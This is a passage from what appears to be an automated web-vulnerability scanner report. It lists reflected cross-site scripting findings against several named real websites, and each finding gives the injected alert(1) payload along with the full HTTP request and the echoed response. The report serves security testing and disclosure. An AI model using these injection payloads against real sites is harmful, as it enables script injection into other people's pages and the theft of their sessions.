X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.2
ETag: "d009d37e9d56f8f839cea714c7a26681"
X-Runtime: 47
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 159
Status: 200
Content-Type: text/javascript; charset=utf-8

JSONPCallback_097df2<script>alert(1)</script>c347156b75c({"blacklists":[],"xpaths":["//div[@class='content-text']"],"message":"new page re-instrumenting: ok"})

2.51. http://pglb.buzzfed.com/148250/91bc34b96eac101805574950b6644cc6 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /148250/91bc34b96eac101805574950b6644cc6

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload cf6f5<script>alert(1)</script>7bb596485ce was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /148250/91bc34b96eac101805574950b6644cc6?callback=BF_PARTNER.gate_responsecf6f5<script>alert(1)</script>7bb596485ce&cb=1793 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604763
Expires: Mon, 19 Sep 2011 12:47:23 GMT
Date: Mon, 12 Sep 2011 12:48:00 GMT
Connection: close

BF_PARTNER.gate_responsecf6f5<script>alert(1)</script>7bb596485ce(1304470645);

2.52. http://player.ooyala.com/player.js [autoplay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://player.ooyala.com
Path:   /player.js

Issue detail

The value of the autoplay request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5fc32%3balert(1)//3209774be4c was submitted in the autoplay parameter. This input was echoed as 5fc32;alert(1)//3209774be4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player.js?autoplay=05fc32%3balert(1)//3209774be4c&width=900&deepLinkEmbedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&height=506&embedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr HTTP/1.1
Host: player.ooyala.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/ajaxharness1274b%22-alert(document.location)-%22faa5baba69b?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 12 Sep 2011 13:02:06 GMT
Content-Type: text/javascript; charset=utf-8
X-Ooyala-Server-Id: i-9d79a4f1
X-Pad: avoid browser bug
Content-Length: 26501
Cache-Control: private, max-age=300
Date: Mon, 12 Sep 2011 13:02:06 GMT
Connection: close
Vary: Accept-Encoding

(function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f
...[SNIP]...
NJl90x_Sxol5VyMQcXiGLsb0g2h6vnF5i0-T5Ft4xBOt5dq6lB95jeM5d5eZMMassZqCrj2-1YzQoYyyPKpBOsL7oivj3RtKy7";var S=window.location.href;if(S){if(G&&(G[G.length-1]!="&")){G+="&";}G+="docUrl="+escape(S);}var O="05fc32;alert(1)//3209774be4c";if(document.location.host.toLowerCase().indexOf("beboframe.com")>
...[SNIP]...

2.53. http://savannahnow.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://savannahnow.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4324a'-alert(1)-'2befc103ff4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?4324a'-alert(1)-'2befc103ff4=1 HTTP/1.1
Host: savannahnow.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 12 Sep 2011 12:49:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: MISS
Expires: Mon, 12 Sep 2011 12:54:27 GMT
Last-Modified: Mon, 12 Sep 2011 12:49:26 +0000
Cache-Control: must-revalidate, max-age=0, s-maxage=300
ETag: "1315831766"-gzip
Vary: Accept-Encoding
Content-Length: 149917
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sms8.morris.com
X-Cache-Lookup: MISS from sms8.morris.com:3128
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
// MDW_Group
           s.prop17='Home' // MDW_Cat
           s.prop18='97010 Home' // MDW_Sub_Cat
           s.prop19=''
           s.prop20=''
s.prop21 = '' //NID
s.prop22 = '' //Author
s.prop23 = '?4324a'-alert(1)-'2befc103ff4=1' //Tax
s.prop24 = '' //Content type
s.campaign=s.getQueryParam('cid');

           /********* INSERT THE DOMAIN AND PATH TO YOUR CODE BELOW ************/

           var s_code=s.t();if(s_code)document.
...[SNIP]...

2.54. http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://savannahnow.com
Path:   /sites/all/modules/morris/yca_plugin/yahoo.cssca685

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ae60'-alert(1)-'04761a867b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites6ae60'-alert(1)-'04761a867b7/all/modules/morris/yca_plugin/yahoo.cssca685 HTTP/1.1
Host: savannahnow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cm.npc-morris.overture.com/js_1_0/?config=9472395290&type=home_page&ctxtId=home_page&source=npc_morris_savannahmorningnews_t2_ctxt&adwd=420&adht=150&ctxtUrl=http%3A//savannahnow.com/&css_url=http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685%22%3E%3Cscript%3Ealert(1)%3C/script%3E7a61d61a441&tg=1&bg=FFFFFF&bc=FFFFFF&refUrl=http%3A//drupal.org/cases&du=1&cb=1315849723547

Response

HTTP/1.0 404 Not Found
Date: Mon, 12 Sep 2011 13:00:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: MISS
Expires: Mon, 12 Sep 2011 13:05:48 GMT
Last-Modified: Mon, 12 Sep 2011 13:00:48 +0000
Cache-Control: must-revalidate, max-age=0, s-maxage=300
ETag: "1315832448"-gzip
Vary: Accept-Encoding
Content-Length: 79238
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sms8.morris.com
X-Cache-Lookup: MISS from sms8.morris.com:3128
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
up
           s.prop17='97040 Other' // MDW_Cat
           s.prop18='97040 Other' // MDW_Sub_Cat
           s.prop19=''
           s.prop20=''
s.prop21 = '' //NID
s.prop22 = '' //Author
s.prop23 = 'Sites6ae60'-alert(1)-'04761a867b7' //Tax
s.prop24 = '' //Content type
s.campaign=s.getQueryParam('cid');

           /********* INSERT THE DOMAIN AND PATH TO YOUR CODE BELOW ************/

           var s_code=s.t();if(s_code)document.wr
...[SNIP]...

2.55. http://video.fastcompany.com/companies/mansueto-digital/videos.rss [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.fastcompany.com
Path:   /companies/mansueto-digital/videos.rss

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 28b0a<script>alert(1)</script>3cd7c3816cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /companies28b0a<script>alert(1)</script>3cd7c3816cf/mansueto-digital/videos.rss?ids=35a3467f31b51,5a74966232a47,1bc51eb069eb1,29b58b01bf488,79b00a7ba65dd,273bd40607339&append_image_to_description=false&verbosity=low&p=fc_playlist_homepage&template_ids=rtmp_only%2Cflowplayer%2Cflowplayer_bwcheck&assets=dynamic_stream_switching_capable&append_image_to_description=false&still_frame_height=180 HTTP/1.1
Host: video.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://video.fastcompany.com/plugins/player.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1603584230-1315849705375

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:49:11 GMT
Server: VoxCAST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Status: 404
X-Runtime: 15
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
Content-Length: 610
X-Cache: MISS from VoxCAST

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<body>
<h1>File "/companies28b0a<script>alert(1)</script>3cd7c3816cf/mansueto-digital/videos.rss?ids=35a3467f31b51,5a74966232a47,1bc51eb069eb1,29b58b01bf488,79b00a7ba65dd,273bd40607339&append_image_to_description=false&verbosity=low&p=fc_playlist_homepage&template_ids=
...[SNIP]...

2.56. http://www.ciphertex.com/misc/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /misc/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27b58"><a>9130c261090 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /misc27b58"><a>9130c261090/favicon.ico HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:04 GMT
Vary: Accept-Encoding
Content-Length: 9999
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-misc27b58"><a>9130c261090-favicon.ico" class="section-misc27b58">
...[SNIP]...

2.57. http://www.ciphertex.com/modules/system/defaults.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /modules/system/defaults.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99907"><a>10a7c8eef9e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /99907"><a>10a7c8eef9e/system/defaults.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:35 GMT
Vary: Accept-Encoding
Content-Length: 10005
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-99907"><a>10a7c8eef9e-system-defaults.css" class="section-99907">
...[SNIP]...

2.58. http://www.ciphertex.com/modules/system/maintenance.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /modules/system/maintenance.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58e7f"><a>be9fe9bf51d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /58e7f"><a>be9fe9bf51d/system/maintenance.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:26 GMT
Vary: Accept-Encoding
Content-Length: 10011
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-58e7f"><a>be9fe9bf51d-system-maintenance.css" class="section-58e7f">
...[SNIP]...

2.59. http://www.ciphertex.com/modules/system/system-menus.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /modules/system/system-menus.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d310"><a>4a350385199 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /9d310"><a>4a350385199/system/system-menus.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:32 GMT
Vary: Accept-Encoding
Content-Length: 10013
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-9d310"><a>4a350385199-system-system-menus.css" class="section-9d310">
...[SNIP]...

2.60. http://www.ciphertex.com/modules/system/system-menus.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /modules/system/system-menus.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78804"><a>580dc18678 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /modules/system78804"><a>580dc18678/system-menus.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:46:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:46:03 GMT
Vary: Accept-Encoding
Content-Length: 10011
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-modules-system78804"><a>580dc18678-system-menus.css" class="section-modules sidebar-none">
...[SNIP]...

2.61. http://www.ciphertex.com/modules/system/system.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /modules/system/system.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8557"><a>87f9da9af62 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /modules/system/system.cssc8557"><a>87f9da9af62?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:24 GMT
Vary: Accept-Encoding
Content-Length: 10001
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-modules-system-system.cssc8557"><a>87f9da9af62" class="section-modules sidebar-none">
...[SNIP]...

2.62. http://www.ciphertex.com/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b77bd"><a>f6aa1bd3806 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/cck/modules/b77bd"><a>f6aa1bd3806/fieldgroup.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:32 GMT
Vary: Accept-Encoding
Content-Length: 10039
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-cck-modules-b77bd"><a>f6aa1bd3806-fieldgroup.css" class="section-sites sidebar-none">
...[SNIP]...

2.63. http://www.ciphertex.com/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77d66"><a>596ac13dd54 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/cck/modules/fieldgroup/77d66"><a>596ac13dd54?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:40 GMT
Vary: Accept-Encoding
Content-Length: 10031
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
